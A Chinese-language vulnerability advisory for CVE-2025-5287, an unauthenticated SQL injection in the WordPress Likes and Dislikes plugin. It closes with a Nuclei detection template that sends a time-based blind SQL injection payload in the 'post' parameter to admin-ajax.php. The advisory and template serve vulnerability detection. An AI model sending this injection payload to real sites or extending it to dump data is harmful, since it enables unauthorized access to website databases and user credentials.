WordPress Likes and Dislikes Plugin SQL Injection Vulnerability

漏洞信息

漏洞名称： WordPress Likes and Dislikes Plugin SQL Injection Vulnerability

漏洞编号：

• CVE： CVE-2025-5287

漏洞类型： SQL注入

漏洞等级： 高危

漏洞描述： WordPress Likes and Dislikes插件≤1.0.0版本存在未认证的SQL注入漏洞。该漏洞源于对post参数缺乏输入清理和预编译语句的使用，攻击者可以利用此漏洞泄露或操纵数据库内容。

受影响产品: WordPress Likes and Dislikes插件是一款用于WordPress网站的插件，允许用户对内容进行喜欢或不喜欢的投票。它广泛应用于各种WordPress网站中，用于增加用户互动。

漏洞解释: 此漏洞属于SQL注入类型，由于插件在处理用户输入的post参数时，未进行充分的输入验证和清理，导致攻击者可以构造恶意的SQL语句，通过未认证的请求执行任意SQL命令。这反映了开发过程中对安全编码实践的忽视，特别是在处理用户可控输入时未使用参数化查询或预编译语句。

影响分析: 该漏洞允许攻击者在无需任何认证的情况下，通过发送特制的HTTP请求，执行任意的SQL查询。这可能导致数据库中的敏感信息泄露，如用户凭证、个人信息等，甚至可能被用来进一步攻击网站的其他部分。由于漏洞的利用不需要用户交互，且可以通过自动化工具进行大规模扫描和攻击，因此对使用该插件的网站构成了严重的安全威胁。

产品厂商： WordPress

产品名称： Likes and Dislikes Plugin

影响版本： ≤ 1.0.0

来源： https://github.com/projectdiscovery/nuclei-templates/blob/d3bd9c20c7e3a0d9cf45496f8847c950325d9073/http%2Fcves%2FCVE-2025-5287.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-5287

info:
  name: WordPress Likes and Dislikes Plugin ≤ 1.0.0 - Unauthenticated SQL Injection
  author: pussycat0x
  severity: high
  description: |
    The Likes and Dislikes plugin ≤ 1.0.0 is vulnerable to unauthenticated SQL Injection via the post parameter. This stems from missing input sanitization and lack of prepared statements.Attackers can exploit it to leak or manipulate database content.
  reference:
    - https://github.com/Nxploited/CVE-2025-5287
  tags: cve,cve2025,wordpress,wp-plugin,sqli,plugin,likes-and-dislikes

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like  


    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'contains(body_1, 'plugins/posts-like-dislike')'
        condition: and